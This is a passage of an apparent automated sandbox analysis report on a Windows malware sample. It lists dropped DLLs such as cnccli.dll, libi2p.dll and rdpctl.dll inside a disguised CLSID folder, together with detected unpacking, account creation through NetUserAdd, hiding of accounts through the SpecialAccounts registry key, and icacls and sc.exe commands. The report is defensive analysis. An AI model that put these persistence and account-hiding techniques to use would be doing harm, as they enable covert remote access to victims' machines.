Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: cZO.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: cZO.exeStatic file information: File size 4528128 > 1048576
Source: cZO.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x355e00
Source: Binary string: RfxVmt.pdb source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr
Source: Binary string: RfxVmt.pdbGCTL source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2453846580.000002234F1D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, GEGgzh0s.22.dr, update.pkg.11.dr

Data Obfuscation

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\cZO.exeUnpacked PE file: 0.2.cZO.exe.2510000.1.unpack
Source: rfxvmt.dll.22.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572FF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF77572FF1F
Source: cZO.exeStatic PE information: section name: .didata
Source: vc71izwl68ub3txurufnpr09g6ni3.exe.1.drStatic PE information: section name: .xdata
Source: shdpeqdz2a54sj46ur0.exe.1.drStatic PE information: section name: .xdata
Source: main.exe.11.drStatic PE information: section name: .xdata
Source: rdpctl.dll.22.drStatic PE information: section name: .xdata
Source: samctl.dll.22.drStatic PE information: section name: .xdata
Source: prgmgr.dll.22.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.22.drStatic PE information: section name: .xdata
Source: cnccli.dll.22.drStatic PE information: section name: .xdata
Source: libi2p.dll.22.drStatic PE information: section name: .xdata
Source: evtsrv.dll.22.drStatic PE information: section name: .xdata
Source: termsrv32.dll.22.drStatic PE information: section name: .xdata
Source: EgwqOk24.22.drStatic PE information: section name: .xdata
Source: OwuZZod2.22.drStatic PE information: section name: .xdata
Source: GmdNT1AN.22.drStatic PE information: section name: .xdata
Source: o6oDuAJl.22.drStatic PE information: section name: .xdata
Source: I77yQ5in.22.drStatic PE information: section name: .xdata
Source: XpOp833v.22.drStatic PE information: section name: .xdata
Source: YkhL6reh.22.drStatic PE information: section name: .xdata
Source: YXkdIYk6.22.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024EF262 push es; retf 0_2_024EF263
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D675D push esi; ret 0_2_024D675F
Source: C:\Users\user\Desktop\cZO.exeCode function: 0_2_024D3D4E push eax; iretd 0_2_024D3D4F
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 32_2_00007FF8BFB5FC37 push rsp; ret 32_2_00007FF8BFB5FC38
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF8B915521B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,22_2_00007FF8B915521B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GEGgzh0sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\XpOp833vJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I77yQ5inJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\user\Desktop\cZO.exeFile created: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\EgwqOk24Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o6oDuAJlJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OwuZZod2Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\user\Desktop\cZO.exeFile created: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YXkdIYk6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YkhL6rehJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GmdNT1ANJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GEGgzh0sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\XpOp833vJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I77yQ5inJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\EgwqOk24Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o6oDuAJlJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OwuZZod2Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YXkdIYk6Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YkhL6rehJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GmdNT1ANJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GEGgzh0sJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\EgwqOk24Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\OwuZZod2Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\GmdNT1ANJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\o6oDuAJlJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\I77yQ5inJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\XpOp833vJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YkhL6rehJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\YXkdIYk6Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE038C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF6BE038C4A
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

barindex
Contains functionality to hide user accounts
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000016.00000003.2455168978.000002234F1D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000016.00000003.2455168978.000002234F1D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.3263957296.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000020.00000002.3263957296.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: samctl.dll.22.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: samctl.dll.22.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.11.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.11.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Users\user\Desktop\cZO.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\cZO.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
